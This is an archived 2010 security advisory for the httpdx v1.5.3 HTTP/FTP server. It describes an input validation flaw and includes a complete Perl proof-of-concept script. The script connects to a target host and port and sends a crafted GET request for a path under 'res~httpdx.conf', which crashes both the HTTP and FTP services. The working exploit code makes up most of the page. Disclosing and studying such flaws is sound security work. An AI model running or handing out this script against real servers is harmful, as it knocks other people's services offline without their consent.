Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23410
HistoryMar 18, 2010 - 12:00 a.m.

Vulnerability httpdx v1.5.3

2010-03-1800:00:00
vulners.com
8

#!/usr/bin/perl

Program : Httpdx v1.5.3

PoC : Remote Break Services

Homepage : http://sourceforge.net/projects/httpdx/

Found by : Jonathan Salwan

This Advisory : Jonathan Salwan

Contact : [email protected]

//----- Application description

Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs

with only few threads. Includes directory listing, virtual hosting, basic auth., support

for PHP, Perl, Python, SSI, etc. All settings in one config/script file.

//----- Description of vulnerability

The vulnerability is caused due to an input validation error when processing HTTP requests. This can be

exploited to break all services http & ftp.

//----- Credits

http://www.sysdream.com/article.php?story_id=324&section_id=78

http://www.shell-storm.org

use IO::Socket;
print "\n[x]Httpdx v1.5.3 - Remote Break Services\n";

    if (@ARGV < 1)
            {
            print "[-] Usage: <file.pl> <host> <port>\n";
            print "[-] Exemple: file.pl 127.0.0.1 80\n";
            exit;
            }

    $ip = $ARGV[0];
    $port = $ARGV[1];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n";

    print "[+] Sending request: GET /res~httpdx.conf/image/php.png HTTP/1.1\\r\\nHost: $ip\\r\\n\\r\\n";
    $msg =  "GET /res~httpdx.conf/image/php.png HTTP/1.1\r\nHost: $ip\r\n\r\n";
    $socket->send($msg);

print "\n[+] Done.\n\n";

close($socket);